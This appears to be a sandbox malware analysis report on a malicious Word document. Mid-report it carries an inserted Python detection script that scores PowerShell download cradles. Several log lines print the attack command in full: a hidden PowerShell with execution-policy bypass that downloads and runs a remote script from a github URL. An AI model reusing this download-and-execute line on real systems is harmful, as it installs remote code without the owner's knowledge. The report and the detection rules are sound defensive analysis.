Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj.....\..............................}..v....x]......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .................By............................. .................................................x.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj....p%..............................}..v.....%......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....,......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj....p-..............................}..v.....-......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....................P.Sj....P.W.............................}..v....X3......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj.....4..............................}..v.....4......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............A.t. .l.i.n.e.:.3. .c.h.a.r.:.1.8...............}..v.....8......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w......................Sj....X9..............................}..v.....9......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....@......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....XA..............................}..v.....A......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v.....E......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....F..............................}..v.... G......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....M......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....N..............................}..v.... O......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....PS......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....T..............................}..v.....T......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....Y......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....Z..............................}..v.....[......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....^......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....H_..............................}..v....._......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................Sj....H...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............P.Sj....P.W.............................}..v.....$......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................Sj....H%..............................}..v.....%......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............P.Sj....P.W.............................}..v....0+......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................Sj.....+..............................}..v....h,......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.8...............}..v....x0......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................Sj....01..............................}..v.....1......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............P.Sj....P.W.............................}..v....x8......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................Sj....09..............................}..v.....9......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".h.s.t.a.r.t...v.b.s."...........}..v.....=......0.................W.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................Sj.....>..............................}..v.....?......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....E......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................Sj.....F..............................}..v.....G......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0K......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................Sj.....K..............................}..v....hL......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....Q......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....`R..............................}..v.....R......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v....pV......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....(W..............................}..v.....W......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v....x"......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....0#..............................}..v.....#......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.8...............}..v.....'......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....x(..............................}..v.....(......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v...../......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....x0..............................}..v.....0......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.t.F.i.l.e. .".s.t.a.r.t...c.m.d.".............}..v.....5......0.................W.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....5..............................}..v....@6......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....=......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....=..............................}..v....@>......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....pB......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....(C..............................}..v.....C......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....H......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....I..............................}..v.... J......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....M......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....hN..............................}..v.....N......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....`...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d.........0.................W.....:.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................Sj....................................}..v....X.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v....h.......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................Sj.... ...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................Sj....................................}..v....@.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................Sj....................................}..v....@.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....X.......0.................W.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............P.Sj....P.W.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................W.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{....... .......P.Sj....P.W.............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................Sj....P...............................}..v............0.................W.............................
Source: unknown  Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: RfORrHIRNe.doc  OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\Desktop\~$ORrHIRNe.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\AppData\Local\Temp\CVRD815.tmp
Source: classification engine  Classification label: mal88.expl.winDOC@3/10@3/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: RfORrHIRNe  Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp  Binary or memory string: .VBPud<_
Source: RfORrHIRNe.doc  OLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr  OLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr  OLE document summary: author field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr  OLE document summary: edited time not present or 0
Source: ~DFA094A62AA4BA8959.TMP.0.dr  OLE document summary: title field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.dr  OLE document summary: author field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.dr  OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr  Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
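The two process-creation records above are what the report's Sigma hits ("Microsoft Office Product Spawning Windows Shell", "PowerShell Download from URL", "Windows Suspicious Use Of Web Request in CommandLine") key on. The following is an added detection example, not part of the Joe Sandbox report and not Sigma's own engine: it runs the same two checks (Office parent spawning a shell; PowerShell command line carrying a download cradle, a URL, IEX, a hidden window or an execution-policy bypass) over constructed process-creation events, the first of which reproduces the command line from this report. The event field names, the image lists, the indicator weights and the alert threshold are this example's own assumptions. One detail a string-match rule often misses is covered: powershell.exe accepts any unique prefix of a parameter name, so `-W Hidden` and `-Exec Bypass` are `-WindowStyle Hidden` and `-ExecutionPolicy Bypass`, and the patterns below allow those prefixes.

```python
import ntpath
import re

# Constructed sample events modelled on the "Process created" lines of this report.
# The field names (parent, image, cmdline) are this example's own, not a sandbox schema.
SAMPLE_EVENTS = [
    {   # the command line recorded in the report: Word spawning PowerShell
        "parent": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass "
                    "IEX(New-Object Net.WebClient).DownloadString("
                    "'http://github.com/ssbb36/stv/raw/main/5.mp3')"),
    },
    {   # constructed benign event: an admin script launched from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    },
    {   # constructed: Word itself being started (parent assumed to be Explorer)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
        "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding',
    },
]

# Assumed image lists for the parent/child relationship check.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe", "visio.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line indicators evaluated on PowerShell children. "-w\w*" and "-e\w*"
# accept abbreviated parameter names (-W, -Win, -WindowStyle; -Ex, -Exec, -ExecutionPolicy).
CMDLINE_INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
        r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I),
    "url_in_cmdline": re.compile(r"https?://\S+", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"-e\w*\s+(?:bypass|unrestricted)", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc\w*)\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Assumed weights: the parent/child relationship alone nearly reaches the threshold;
# a cradle plus URL plus IEX from any parent reaches it without Office involvement.
WEIGHTS = {
    "office_spawns_shell": 40, "download_cradle": 25, "url_in_cmdline": 10,
    "invoke_expression": 15, "hidden_window": 10, "execution_policy_bypass": 10,
    "encoded_command": 20,
}
ALERT_THRESHOLD = 50


def classify(event):
    """Return the names of all indicators that fire for one process-creation event."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    reasons = []
    if parent in OFFICE_IMAGES and image in SHELL_IMAGES:
        reasons.append("office_spawns_shell")
    if image in {"powershell.exe", "pwsh.exe"}:
        reasons.extend(name for name, pattern in CMDLINE_INDICATORS.items()
                       if pattern.search(event["cmdline"]))
    return reasons


def score(reasons):
    """Sum the weights of the indicators that fired."""
    return sum(WEIGHTS.get(r, 0) for r in reasons)


def scan(events, threshold=ALERT_THRESHOLD):
    """Return one alert record per event whose indicator score meets the threshold."""
    alerts = []
    for event in events:
        reasons = classify(event)
        total = score(reasons)
        if total >= threshold:
            alerts.append({"image": ntpath.basename(event["image"]),
                           "parent": ntpath.basename(event["parent"]),
                           "score": total, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Running the block alerts on the first event only, with all six indicators firing. The console writes earlier in this report suggest the detection is worth having even when the second stage fails: they show CommandNotFoundException at lines 3, 4 and 5 of the downloaded script, each next to an -OutFile argument, followed by Start-Process failing with "cannot find the file specified" at line 7, and the loaded mscorlib is the .NET 2.0 build, i.e. Windows PowerShell 2.0. Cmdlets such as Invoke-WebRequest only exist from PowerShell 3.0, which is a plausible (not confirmed by the report) reason the payload files were never written; the process tree and the command line were still recorded, and that is what the rules above match.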
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
